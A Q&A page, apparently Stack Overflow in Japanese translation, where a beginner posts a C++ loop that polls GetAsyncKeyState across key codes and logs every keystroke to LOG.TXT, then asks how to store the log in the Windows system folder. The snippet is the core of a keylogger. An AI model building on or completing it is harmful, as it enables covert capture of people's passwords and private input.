Find centralized, trusted content and collaborate around the technologies you use most.
Teams
Q&A for work
Connect and share knowledge within a single location that is structured and easy to search.
私はC++で何かをプログラミングしています.iは最近始めたばかりで、LOG.TXTを同じディレクトリに保存するこのコードがあります。しかし、たとえばどこかに保存するにはどうすればよいですか。c:\Windows\log.txt?
while (1) { for(i = 8; i <= 190; i++) { if (GetAsyncKeyState(i) == -32767) Save(i,"LOG.TXT"); } }